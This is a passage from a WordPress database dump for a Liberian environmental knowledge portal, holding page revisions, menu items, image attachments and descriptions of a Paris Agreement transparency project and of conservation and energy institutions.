00:02:40','a:0:{}',0,'https://ekmsliberia.info/?post_type=jetpack_migration&#038;p=2732',0,'jetpack_migration','',0),(2733,1,'2019-11-24 00:02:40','0000-00-00 00:00:00','','sidebars_widgets','','draft','closed','closed','','','','','2019-11-24 00:02:40','2019-11-24 00:02:40','a:35:{s:7:\"ocs-epa\";a:1:{i:0;s:10:\"nav_menu-3\";}s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:0:{}s:9:\"sidebar-2\";a:0:{}s:14:\"search_sidebar\";a:0:{}s:10:\"footer-one\";a:1:{i:0;s:6:\"text-2\";}s:10:\"footer-two\";a:1:{i:0;s:20:\"ocean_recent_posts-2\";}s:12:\"footer-three\";a:2:{i:0;s:10:\"nav_menu-2\";i:1;s:13:\"custom_html-2\";}s:11:\"footer-four\";a:2:{i:0;s:20:\"ocean_contact_info-1\";i:1;s:14:\"ocean_social-2\";}s:15:\"ca-sidebar-2593\";a:1:{i:0;s:13:\"custom_html-3\";}s:15:\"ca-sidebar-2691\";a:2:{i:0;s:14:\"media_image-19\";i:1;s:20:\"ocean_custom_menu-21\";}s:15:\"ca-sidebar-2445\";a:1:{i:0;s:33:\"core_special_widgets_categories-2\";}s:15:\"ca-sidebar-2224\";a:2:{i:0;s:13:\"media_image-5\";i:1;s:19:\"ocean_custom_menu-8\";}s:15:\"ca-sidebar-2678\";a:2:{i:0;s:14:\"media_image-17\";i:1;s:20:\"ocean_custom_menu-18\";}s:15:\"ca-sidebar-2076\";a:2:{i:0;s:13:\"media_image-2\";i:1;s:19:\"ocean_custom_menu-3\";}s:15:\"ca-sidebar-2088\";a:1:{i:0;s:19:\"ocean_custom_menu-4\";}s:15:\"ca-sidebar-2174\";a:2:{i:0;s:13:\"media_image-3\";i:1;s:19:\"ocean_custom_menu-6\";}s:15:\"ca-sidebar-2226\";a:2:{i:0;s:13:\"media_image-6\";i:1;s:20:\"ocean_custom_menu-11\";}s:15:\"ca-sidebar-2450\";a:1:{i:0;s:33:\"core_special_widgets_categories-3\";}s:15:\"ca-sidebar-2664\";a:2:{i:0;s:13:\"media_image-9\";i:1;s:20:\"ocean_custom_menu-20\";}s:15:\"ca-sidebar-2673\";a:2:{i:0;s:14:\"media_image-16\";i:1;s:20:\"ocean_custom_menu-17\";}s:15:\"ca-sidebar-2470\";a:2:{i:0;s:14:\"media_image-12\";i:1;s:20:\"ocean_custom_menu-15\";}s:15:\"ca-sidebar-2280\";a:2:{i:0;s:14:\"media_image-14\";i:1;s:20:\"ocean_custom_menu-13\";}s:15:\"ca-sidebar-2709\";a:2:{i:0;s:14:\"media_image-22\";i:1;s:20:\"ocean_custom_menu-24\";}s:15:\"ca-sidebar-2699\";a:2:{i:0;s:14:\"media_image-21\";i:1;s:20:\"ocean_custom_menu-23\";}s:15:\"ca-sidebar-2670\";a:2:{i:0;s:14:\"media_image-15\";i:1;s:20:\"ocean_custom_menu-16\";}s:15:\"ca-sidebar-2278\";a:2:{i:0;s:14:\"media_image-13\";i:1;s:20:\"ocean_custom_menu-12\";}s:15:\"ca-sidebar-2176\";a:2:{i:0;s:13:\"media_image-4\";i:1;s:19:\"ocean_custom_menu-7\";}s:15:\"ca-sidebar-2681\";a:2:{i:0;s:14:\"media_image-18\";i:1;s:20:\"ocean_custom_menu-19\";}s:15:\"ca-sidebar-2228\";a:2:{i:0;s:13:\"media_image-7\";i:1;s:20:\"ocean_custom_menu-10\";}s:15:\"ca-sidebar-2230\";a:2:{i:0;s:13:\"media_image-8\";i:1;s:19:\"ocean_custom_menu-9\";}s:15:\"ca-sidebar-2694\";a:2:{i:0;s:14:\"media_image-20\";i:1;s:20:\"ocean_custom_menu-22\";}s:15:\"ca-sidebar-2242\";a:1:{i:0;s:11:\"tag_cloud-2\";}s:15:\"ca-sidebar-2091\";a:1:{i:0;s:19:\"ocean_custom_menu-5\";}s:15:\"ca-sidebar-2467\";a:2:{i:0;s:14:\"media_image-11\";i:1;s:20:\"ocean_custom_menu-14\";}}',0,'https://ekmsliberia.info/?post_type=jetpack_migration&#038;p=2733',0,'jetpack_migration','',0),(2734,1,'2019-11-24 00:52:32','2019-11-24 00:52:32','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-24 00:52:32','2019-11-24 00:52:32','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2746,1,'2022-08-22 10:08:38','2019-11-25 04:25:48','','EKMS CloudDrive','','publish','closed','closed','','ekms-clouddrive','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=2746',17,'nav_menu_item','',0),(2747,1,'2019-11-25 04:34:11','2019-11-25 04:34:11','','EKMS CloudDrive','','publish','closed','closed','','ekms-clouddrive-2','','','2019-11-25 04:34:11','2019-11-25 04:34:11','',0,'https://ekmsliberia.info/?p=2747',3,'nav_menu_item','',0),(2748,1,'2019-11-25 19:13:37','2019-11-25 19:13:37','The objective of this project is to build and strengthen Liberia’s national capacity to implement the transparency elements of the Paris Climate Agreement.','Building and Strengthening Liberia’s National Capacity to Implement the Transparency Elements of the Paris Climate Agreement','The objective of this project is to build and strengthen Liberia’s national capacity to implement the transparency elements of the Paris Climate Agreement.','publish','closed','closed','','building-and-strengthening-liberias-national-capacity-to-implement-the-transparency-elements-of-the-paris-climate-agreement','','','2019-11-25 19:13:37','2019-11-25 19:13:37','',0,'https://ekmsliberia.info/?post_type=project_resource&#038;p=2748',2,'project_resource','',0),(2749,1,'2019-11-25 19:13:13','2019-11-25 19:13:13','','featured_ci_project','© CI/PHOTO BY HEIDI RUFFLER','inherit','open','closed','','featured_ci_project','','','2019-11-25 19:13:26','2019-11-25 19:13:26','',2748,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ci_project.jpg',0,'attachment','image/jpeg',0),(2750,1,'2019-11-25 19:13:37','2019-11-25 19:13:37','The objective of this project is to build and strengthen Liberia’s national capacity to implement the transparency elements of the Paris Climate Agreement.','Building and Strengthening Liberia’s National Capacity to Implement the Transparency Elements of the Paris Climate Agreement','The objective of this project is to build and strengthen Liberia’s national capacity to implement the transparency elements of the Paris Climate Agreement.','inherit','closed','closed','','2748-revision-v1','','','2019-11-25 19:13:37','2019-11-25 19:13:37','',2748,'https://ekmsliberia.info/2748-revision-v1/',0,'revision','',0),(2751,1,'2019-11-25 19:22:16','2019-11-25 19:22:16','Liberia is already bearing the brunt of climate change and recognizes both the current and future climate change associated risks and has committed to a 10% reduction in GHG emissions by 2030 to be achieved via a long-term strategy for attaining carbon neutrality by 2050. Liberia is committed to do more to further cut down on its GHG emissions with support from the international community.\r\n\r\nIt has ratified several protocols and submitted the Initial National Communications (INC) to the UNFCCC in 2013. In 2015 Liberia submitted its INDC, a gesture of its ambition to use nature-based approaches to reduce GHG emissions in light of its domestic circumstances and capabilities. More recently, Liberia ratified the Paris Agreement on climate change1 in which the Enhanced Transparency Framework was established (Article 13) to help understand, compare, harmonize and track national and global commitments in fighting climate change. The “transparency framework” requires countries to regularly provide: (i) A national inventory of greenhouse gas emissions (by sources) and removals (by sinks) (ii) Information necessary to track progress toward achieving their Nationally Determined Contribution (NDC) (iii) Information related to climate change impacts and adaptation (iv) Information on financial, technology transfer and capacity building support needed and received and (v) Information on any support they provide to developing countries. GEF established and operationalized the Capacity Building Initiative for Transparency (CBIT) to support developing countries to prepare to meet the enhanced transparency requirements of the agreement in both the pre- and post-2020 period based on the Paris Agreement. Liberia’s PIF for a project titled “Building and strengthening Liberia’s national capacity to implement the transparency elements of the Paris\r\nAgreement” was submitted and approved by GEF. This was followed by GEF approval of a Project Preparation Grant (PPG) for this project to be implemented by the Liberia Environmental Protection Agency (EPA) and Conservation International (CI).','CBIT Project Document','','publish','closed','closed','','cbit-project-document','','','2022-12-06 10:55:22','2022-12-06 10:55:22','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2751',129,'document','',0),(2752,1,'2019-11-25 19:21:14','2019-11-25 19:21:14','','9923-cbit-liberia-prodoc','','inherit','open','closed','','9923-cbit-liberia-prodoc','','','2019-11-25 19:21:14','2019-11-25 19:21:14','',2751,'https://ekmsliberia.info/wp-content/uploads/2019/11/9923-cbit-liberia-prodoc.pdf',0,'attachment','application/pdf',0),(2754,1,'2019-11-25 20:06:25','2019-11-25 20:06:25','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unfccc/\">UNFCCC</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unccd/\">UNCCD</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unccd/\">UNCCD</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unccd/\">UNCCD</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/unccd/\">UNCCD</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/uncbd/\">UNCBD</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/uncbd/\">UNCBD</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/uncbd/\">UNCBD</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/uncbd/\">UNCBD</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/uncbd/\">UNCBD</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/uncbd/\">UNCBD</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-tag/uncbd/\">UNCBD</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-25 20:06:25','2019-11-25 20:06:25','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2755,1,'2019-11-25 20:08:35','2019-11-25 20:08:35','','featured_capacity','Photo Credit: EPA','inherit','open','closed','','featured_capacity','','','2019-11-25 20:08:51','2019-11-25 20:08:51','',481,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_capacity.jpg',0,'attachment','image/jpeg',0),(2756,1,'2019-11-25 20:23:11','2019-11-25 20:23:11','','featured_drought','Stock Photo','inherit','open','closed','','featured_drought','','','2019-11-25 20:23:25','2019-11-25 20:23:25','',477,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_drought.jpg',0,'attachment','image/jpeg',0),(2757,1,'2019-11-25 20:27:06','2019-11-25 20:27:06','','featured_land_use','','inherit','open','closed','','featured_land_use','','','2019-11-25 20:27:06','2019-11-25 20:27:06','',486,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_land_use.jpg',0,'attachment','image/jpeg',0),(2758,1,'2019-11-25 20:41:01','2019-11-25 20:41:01','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land Degradation and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/topics/\">Topics</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-25 20:41:01','2019-11-25 20:41:01','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2759,1,'2019-11-25 20:43:49','2019-11-25 20:43:49','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land Degradation and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-25 20:43:49','2019-11-25 20:43:49','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2769,1,'2019-11-25 23:29:55','2019-11-25 23:29:55','The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.\r\n\r\nSCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.\r\n','Society for the Conservation of Nature of Liberia','','publish','closed','closed','','society-for-the-conservation-of-nature-of-liberia','','','2021-08-17 22:10:55','2021-08-17 22:10:55','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=2769',20,'institution','',0),(2770,1,'2019-11-25 23:29:30','2019-11-25 23:29:30','','featured_scnl','Photo Credit: SCNL','inherit','open','closed','','featured_scnl','','','2019-11-25 23:29:47','2019-11-25 23:29:47','',2769,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_scnl.jpg',0,'attachment','image/jpeg',0),(2771,1,'2019-11-25 23:29:55','2019-11-25 23:29:55','The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.\r\n\r\nThe Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.\r\n<h2>Featured Projects</h2>\r\n<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img title=\"Enhancing Resilience of Vulnerable Coastal Areas\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" sizes=\"(max-width: 1024px) 100vw, 1024px\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" width=\"1024\" height=\"530\" /></a> <a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Society for the Conservation of Nature of Liberia','','inherit','closed','closed','','2769-revision-v1','','','2019-11-25 23:29:55','2019-11-25 23:29:55','',2769,'https://ekmsliberia.info/2769-revision-v1/',0,'revision','',0),(2772,1,'2019-11-25 23:32:06','2019-11-25 23:32:06','<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.</p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate 